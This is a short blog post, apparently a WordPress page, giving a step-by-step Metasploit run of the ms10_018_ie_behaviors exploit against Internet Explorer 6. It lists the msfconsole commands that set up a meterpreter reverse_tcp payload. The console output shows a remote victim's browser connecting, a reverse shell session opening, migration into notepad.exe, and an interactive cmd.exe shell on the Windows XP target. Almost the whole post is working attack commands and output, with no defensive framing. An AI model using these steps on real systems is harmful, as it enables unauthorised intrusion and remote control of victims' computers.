control – metasploit ms10_018_ie_behaviors

backtrack 5r1

tested with i.e version: 6.0 SP3

root@bt:~# msfconsole
msf > use windows/browser/ms10_018_ie_behaviors
msf exploit(ms10_018_ie_behaviors) > set lhost Local-IP-Address
msf exploit(ms10_018_ie_behaviors) > set URIPATH /test
msf exploit(ms10_018_ie_behaviors) > set SRVHOST Local-IP-Address
msf exploit(ms10_018_ie_behaviors) > set payload windows/meterpreter/reverse_tcp
msf exploit(ms10_018_ie_behaviors) > exploit

Remote client browser connects to http://local-ip-address:8080/test this starts the exploit

[*] Exploit running as background job.

[*] Started reverse handler on local-ip-address:4444
msf exploit(ms10_018_ie_behaviors) > [*] Using URL: http://local-ip-address:8080/test
[*] Server started.
[*] remote-ip-address ms10_018_ie_behaviors - Sending Internet Explorer DHTML Behaviors Use After Free (target: IE 6 SP0-SP2 (onclick))...
[*] Sending stage (752128 bytes) to remote-ip-address
[*] Meterpreter session 1 opened (local-ip-address:4444 -> remote-ip-address:1063) at 1974-08-10 12:35:58 +0100
[*] Session ID 1 (local-ip-address:4444 -> remote-ip-address:1063) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: IEXPLORE.EXE (4080)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3612
[+] Successfully migrated to process

Press enter a few times at this point

msf exploit(ms10_018_ie_behaviors) > show sessions

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 test-pc\11 @ test-pc local-ip-address:4444 -> remote-ip-address:1063 (remote-ip-address)

msf exploit(ms10_018_ie_behaviors) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > execute -f cmd.exe -c
Process 1264 created.
Channel 1 created.
meterpreter > interact 1
Interacting with channel 1...

Microsoft Windows XP [Version 4]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\11\Desktop>

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s